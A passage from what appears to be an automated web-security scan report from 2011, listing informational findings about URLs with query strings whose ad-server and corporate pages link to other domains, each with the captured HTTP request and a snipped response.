<a target="_blank" href="http://ads.bluelithium.com/clk?3,eAGlUU2TmkAQ.TM5pYzzzcwuNYfBcVfEEUH8IJcUwi6KGFTYws2vDwmllXveoft1d.Xr6m5EbMYzCEWWQQIJT9-IjQgmb6mAqbUbQNu2CUFPFuZ4sPVWWk1Gc1c5F.e8Un.hxR9ez.7YQLn3oKvnSo-m1keX7TEz8F79P6-z6WNQNzDv1ZL2l7soXOehrVMWbwJmdNrONgH1ddyY6KU0I3Qw2qWzKKXfo-xoovVpjg2N20enHOyb5vwMQF5Wu6QcJtds-Jnsq2qYViewdF8lYpcDFO9PGBjJBReEDBEVEBLKO8I6YNQRxDnFHGhZn6trU4OlxMyyqMDs2YTjEfjxWTZSFWvrctzVae1fJ-GNxZ4fHyBkP-PUAbGM1cT3wXi7kIggRjCkQoCZrLfzIn.13MWYn1V4LqJy2BaBOZl9xpMjO71UuXLMRgFHwmYZBo2jw9PqG5j2Mt2bhWDQwhgDT8biQhtye9ftaJbrxW1ixus2AEpalFFEKAglBF-.3M.Sb.PPSX4D3Eql3w==,http://clk.atdmt.com/go/332867993/direct;ai.222372080;ct.1/01"><img border="0" src="HTTP://ec.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.jpg?ver=1" width="300" height="100" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=123400100201TR1&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1024038&sid=332867993&adid="></script><script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=1042775&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1043704&sid=332867993&adid="></script>
...[SNIP]...

15.106. http://view.atdmt.com/TR1/iview/332867993/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /TR1/iview/332867993/direct/01

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /TR1/iview/332867993/direct/01?time=1315313115&click=http://ads.bluelithium.com/clk?3,eAGlkEtvm0AUhf9MV5XLzDAzDAmaxfBweBhjHBybbCweDg7ggoHIpr--qK6t7ns255Ou7rm6B2EtQ.SDoYMCP57QQWW5hrCMDxlVkIpmUNM0mamEyQRBONt5G1PYxtIR-tlpN-KmrnXDvyiEL5w7QyFCYRqu8jX5H3lJf71P.8.N3H0cmg4Wt7Ria89XpaM.sk3rEkfhZSnHZLENSWDGgx.Na9-AJD754yLKyHuUV370dlq-LCv.sSj47DgM7TMARd2kSS0lXS6NybFppKw5gVfnhSN6VoqirA.A50xlKsYSIiqEmLAJ6CQZTYAYIzIDJu.bpht68MplqihElemzv7YMsB.rgYvyTTlXaZ.1QWevrzT2gvgTQvozznQQ81jYQQCs3YojjCiWIYYULHjWtNf91nNWFmvFui2jWrqUoav6x5wlFT3Nc0sYi.0voPN4311FrpvrsfgB3FvMlAUpQ1h9YsDjnZpcdtmmcu0yTT9x-D6mWRMCwRVCCcIErDkE37.da7l9808lvwEx7qgw, HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAHCNIABqIpUAAAAAAArpJQAAAAAAAAAMAIAAAAAAAA0AAQADCJ6uAQAAAAAAKasxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAMR19m7APwAAAAAAAAAAAADEdfZuwD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTzbx8WfquCrkAQGF3mkTKtl2.WiYSu9rp2McYAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15q6ggjle%2FM%3D787833.14800347.14555521.14177427%2FD%3Dsports%2FS%3D25664825%3AMREC%2F_ylt%3DAjV6qkbscsOrHRx5YKOYi005nYcB%2FY%3DYAHOO%2FEXP%3D1315320305%2FL%3Dcopx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z%2FB%3DY_rxAdBDRyg-%2FJ%3D1315313105713897%2FK%3Dr8awXcUkJHjbbi3QZybcoQ%2FA%3D6454134%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26S%3D14800347%26Z%3D300x100%26_PVID%3Dcopx%255fWKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL%255fz%26_salt%3D678154096%26cb%3D1315313105713897%26i%3D140509%26r%3D0%26ycg%3D%26yyob%3D%26zip%3D,10a407f8-d886-11e0-8bc2-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:15 GMT
Connection: close
Content-Length: 9420

<html><head><title>multipolicy_300x100</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<div style="display: none">
<img src="http://testdm.travelers.com/trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993"/>
</div>
...[SNIP]...
<noscript>
<a target="_blank" href="http://ads.bluelithium.com/clk?3,eAGlkEtvm0AUhf9MV5XLzDAzDAmaxfBweBhjHBybbCweDg7ggoHIpr--qK6t7ns255Ou7rm6B2EtQ.SDoYMCP57QQWW5hrCMDxlVkIpmUNM0mamEyQRBONt5G1PYxtIR-tlpN-KmrnXDvyiEL5w7QyFCYRqu8jX5H3lJf71P.8.N3H0cmg4Wt7Ria89XpaM.sk3rEkfhZSnHZLENSWDGgx.Na9-AJD754yLKyHuUV370dlq-LCv.sSj47DgM7TMARd2kSS0lXS6NybFppKw5gVfnhSN6VoqirA.A50xlKsYSIiqEmLAJ6CQZTYAYIzIDJu.bpht68MplqihElemzv7YMsB.rgYvyTTlXaZ.1QWevrzT2gvgTQvozznQQ81jYQQCs3YojjCiWIYYULHjWtNf91nNWFmvFui2jWrqUoav6x5wlFT3Nc0sYi.0voPN4311FrpvrsfgB3FvMlAUpQ1h9YsDjnZpcdtmmcu0yTT9x-D6mWRMCwRVCCcIErDkE37.da7l9808lvwEx7qgw,http://clk.atdmt.com/go/332867993/direct;ai.222372080;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.jpg?ver=1" width="300" height="100" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=123400100201TR1&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1024038&sid=332867993&adid="></script><script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=1042775&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1043704&sid=332867993&adid="></script>
...[SNIP]...

15.107. http://view.atdmt.com/TR1/iview/332867993/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /TR1/iview/332867993/direct/01

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /TR1/iview/332867993/direct/01?time=1315313294&click=http://ads.bluelithium.com/clk?3,eAGlUcFymzAQ.ZmeOi5CEhJyGB2EZTsyKAYbN1YvHQoEl0DBMRk7-frSMPbk3j3svt2dfTv7FmKPPhV5SrOcpqywKSk8iBEuMgYLF09sz.MwxIRhShid7IOdFEGVL4V.VN1OfFhgXoMR.fOxUNdk6JdCzlb0daiOFmr72v2.KPPVbdGwsBzZsourokr5N26ZEVMpxyBth4-xs5am18mi1jP42zQah0nm.EjyZ52Yi343xJxvk3xy6PvuDoCybn-ltZW-5NZbemhbK2sbsFVLDkkH02NJENDcZS7D2IKOw8h06g5gEJFhZDEy1FwKJD917Ut.AluOCKUOQ-ROqwiBn291z0VTovVC0WxV72pVNpKiBC9s8sdkPjDciPv1Gsz3EYcYEoxshzEQ8tP-oSqXgYrmbic2XZXU1rmKdaMPuZs-k2bRlsLXjwL4.D3fbuLel5tm9w2sRprhz4wRmyKEQMANOzo9vjzJ8ywsZXS51.Pv5xgIThFz3KkLNtwGX79cVRmv-aTIX9-bpp4=, HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAKjdGABqIpUAAAAAAKYuKAAAAAAAAAAQAIAAAAAAAAUAAgADCJ6uAQAAAAAAALM0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAAB7Z0aGlD8AAOwCYJrhPwAAAAAAAAAAAADsAmCa4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkoZaPCvuuCiHSoGGlzAQsR4Xln-gZOQV-mtGzAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p1aqg52%2FM%3D787833.14485997.14323832.8514476%2FD%3Dsports%2FS%3D25664825%3AMIP2%2F_ylt%3DAmg2OFI6cJlUlIgmD62T3F05nYcB%2FY%3DYAHOO%2FEXP%3D1315320488%2FL%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%2FB%3DzdSRQtBDRmU-%2FJ%3D1315313288506222%2FK%3DY8q4t3xfDwCLgDPxHMEVwQ%2FA%3D6284797%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14485997%26Z%3D300x100%26_PVID%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%26_salt%3D2535976306%26cb%3D1315313288506222%26i%3D140509%26r%3D0,79b28cc4-d886-11e0-bbc7-78e7d161369c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:15 GMT
Connection: close
Content-Length: 9400

<html><head><title>multipolicy_300x100</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<div style="display: none">
<img src="http://testdm.travelers.com/trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993"/>
</div>
...[SNIP]...
<noscript>
<a target="_blank" href="http://ads.bluelithium.com/clk?3,eAGlUcFymzAQ.ZmeOi5CEhJyGB2EZTsyKAYbN1YvHQoEl0DBMRk7-frSMPbk3j3svt2dfTv7FmKPPhV5SrOcpqywKSk8iBEuMgYLF09sz.MwxIRhShid7IOdFEGVL4V.VN1OfFhgXoMR.fOxUNdk6JdCzlb0daiOFmr72v2.KPPVbdGwsBzZsourokr5N26ZEVMpxyBth4-xs5am18mi1jP42zQah0nm.EjyZ52Yi343xJxvk3xy6PvuDoCybn-ltZW-5NZbemhbK2sbsFVLDkkH02NJENDcZS7D2IKOw8h06g5gEJFhZDEy1FwKJD917Ut.AluOCKUOQ-ROqwiBn291z0VTovVC0WxV72pVNpKiBC9s8sdkPjDciPv1Gsz3EYcYEoxshzEQ8tP-oSqXgYrmbic2XZXU1rmKdaMPuZs-k2bRlsLXjwL4.D3fbuLel5tm9w2sRprhz4wRmyKEQMANOzo9vjzJ8ywsZXS51.Pv5xgIThFz3KkLNtwGX79cVRmv-aTIX9-bpp4=,http://clk.atdmt.com/go/332867993/direct;ai.222372080;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.jpg?ver=1" width="300" height="100" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=123400100201TR1&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1024038&sid=332867993&adid="></script><script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=1042775&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1043704&sid=332867993&adid="></script>
...[SNIP]...

15.108. http://view.atdmt.com/ULA/iview/351127232/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /ULA/iview/351127232/direct/01

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ULA/iview/351127232/direct/01?time=0.6476867063902318&click=http://global.ard.yahoo.com/SIG=15ofquilq/M=801389.14847586.14590575.8842099/D=movies/S=7820639:LREC/_ylt=ArDkTjjTVQQGSE3cO1ppKBlfVXcA/Y=YAHOO/EXP=1315320297/L=6231TkWTWyDpARpjTl.wjQVUMhd7ak5mFckABi.p/B=xJy5EGKJiRw-/J=1315313097544579/K=3q_Pgfb1tF9EF5Bt89NjSg/A=6481381/R=0/* HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:00 GMT
Connection: close
Content-Length: 8264

<html><head><title>300x250_BTBS_Dante_Yh1k</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0p
...[SNIP]...
<noscript>
<a target="_blank" href="http://global.ard.yahoo.com/SIG=15ofquilq/M=801389.14847586.14590575.8842099/D=movies/S=7820639:LREC/_ylt=ArDkTjjTVQQGSE3cO1ppKBlfVXcA/Y=YAHOO/EXP=1315320297/L=6231TkWTWyDpARpjTl.wjQVUMhd7ak5mFckABi.p/B=xJy5EGKJiRw-/J=1315313097544579/K=3q_Pgfb1tF9EF5Bt89NjSg/A=6481381/R=0/*http://clk.atdmt.com/go/351127232/direct;ai.235071350;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/UXULASONYSPE/Bucky_Larson_Born_to_be_a_Star/300x250_Friday.jpg?ver=1" width="300" height="250" />
...[SNIP]...

15.109. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000766755/mnum=0000957105/cstr=73910453=_4e6615c4,4031732766,766755^957105^77^0,1_/xsxdata=$xsxdata/bnum=73910453/optn=64?trg= HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:56 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=5b1d53ac-cce1-43be-9dc6-ea715871af12; expires=Tue, 06-Mar-2012 13:44:56 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1755

<div id="theme180x150A01H1F0L1P0000V1_1Container"> <style type="text/css" media="screen">                                @import url(http://aranet.vo.llnwd.net/o28/themes/css/theme180x150A01H1F0L1P0000V1_1.css);                            </sty
...[SNIP]...
<td class="imageContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000766755/mnum=0000957105/cstr=73910453=_4e6615c4,4031732766,766755^957105^77^0,1_/xsxdata=$xsxdata/bnum=73910453/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3df03bf662-d78f-4004-8d86-f571fc57b7fd%26ArticleId%3d2965%26ComboId%3d15665%26title%3d-500K-life-insurance-no-exam-necessary%26origin%3d222842-APP15%26subid%3d0000766755%26segments%3d"><img class="size100x75" alt="" src="http://aranet.vo.llnwd.net/o28/resources/100x75/2965_326ac1ce-8a1c-4268-80da-2e5d7d9ecb3d.jpg" width="100" height="75"></a>
...[SNIP]...
<td class="textContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000766755/mnum=0000957105/cstr=73910453=_4e6615c4,4031732766,766755^957105^77^0,1_/xsxdata=$xsxdata/bnum=73910453/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3df03bf662-d78f-4004-8d86-f571fc57b7fd%26ArticleId%3d2965%26ComboId%3d15665%26title%3d-500K-life-insurance-no-exam-necessary%26origin%3d222842-APP15%26subid%3d0000766755%26segments%3d"><h4>
...[SNIP]...

15.110. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000790042/mnum=0000957105/cstr=62371385=_4e6615c4,2458564453,790042^957105^77^0,1_/xsxdata=$xsxdata/bnum=62371385/optn=64?trg= HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:53 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=5b1d53ac-cce1-43be-9dc6-ea715871af12; expires=Tue, 06-Mar-2012 13:44:53 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1755

<div id="theme180x150A01H1F0L1P0000V1_1Container"> <style type="text/css" media="screen">                                @import url(http://aranet.vo.llnwd.net/o28/themes/css/theme180x150A01H1F0L1P0000V1_1.css);                            </sty
...[SNIP]...
<td class="imageContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000790042/mnum=0000957105/cstr=62371385=_4e6615c4,2458564453,790042^957105^77^0,1_/xsxdata=$xsxdata/bnum=62371385/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3df03bf662-d78f-4004-8d86-f571fc57b7fd%26ArticleId%3d2965%26ComboId%3d15665%26title%3d-500K-life-insurance-no-exam-necessary%26origin%3d222840-APP14%26subid%3d0000790042%26segments%3d"><img class="size100x75" alt="" src="http://aranet.vo.llnwd.net/o28/resources/100x75/2965_326ac1ce-8a1c-4268-80da-2e5d7d9ecb3d.jpg" width="100" height="75"></a>
...[SNIP]...
<td class="textContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000790042/mnum=0000957105/cstr=62371385=_4e6615c4,2458564453,790042^957105^77^0,1_/xsxdata=$xsxdata/bnum=62371385/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3df03bf662-d78f-4004-8d86-f571fc57b7fd%26ArticleId%3d2965%26ComboId%3d15665%26title%3d-500K-life-insurance-no-exam-necessary%26origin%3d222840-APP14%26subid%3d0000790042%26segments%3d"><h4>
...[SNIP]...

15.111. http://www.aptela.com/lp2011/T2V1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /lp2011/T2V1/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<!-- Google Website Optimizer Co
...[SNIP]...
</script>

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://munchkin.marketo.net/js/munchkin.js"></script>
...[SNIP]...
</p>

   
<script src="http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025" language="JavaScript" type="text/javascript"></script>    

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1070493593/?label=CK09CJGgigIQmd-5_gM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...

15.112. http://www.comcast.com/Corporate/Customers/contactus/ContactUs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /Corporate/Customers/contactus/ContactUs.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Corporate/Customers/contactus/ContactUs.html? HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331726|PC#1315327839174-766376.19#1316539466|check#true#1315329926; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; fsr.a=1315329865492; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331665408%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329866001'%255D%255D%7C1473182666001%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331666014%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 18 Aug 2011 20:12:17 GMT
Accept-Ranges: bytes
ETag: "80e66e20e35dcc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 12:24:26 GMT
Connection: close
Content-Length: 28636

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><ti
...[SNIP]...
<LI><A href="http://www.comcastsupport.com/chat" target=_blank>Chat with a Comcast Customer Service Representative</A>
...[SNIP]...
<div id="footer" xmlns="">
           ..2011 Comcast
           | <a title="Investor Relations" href="http://www.cmcsk.com">Investor Relations</a>
...[SNIP]...

15.113. https://www.comcast.com/Localization/Localize.cspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/Localize.cspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Localization/Localize.cspx?Referer=%2fshop%2fbuyflow%2fdefault.ashx%3farea%3d6%26SourcePage%3dVOIP HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: http://shop.comcast.com/XFINITY/voice/?CMP=KNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136&iq_id=34270410
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
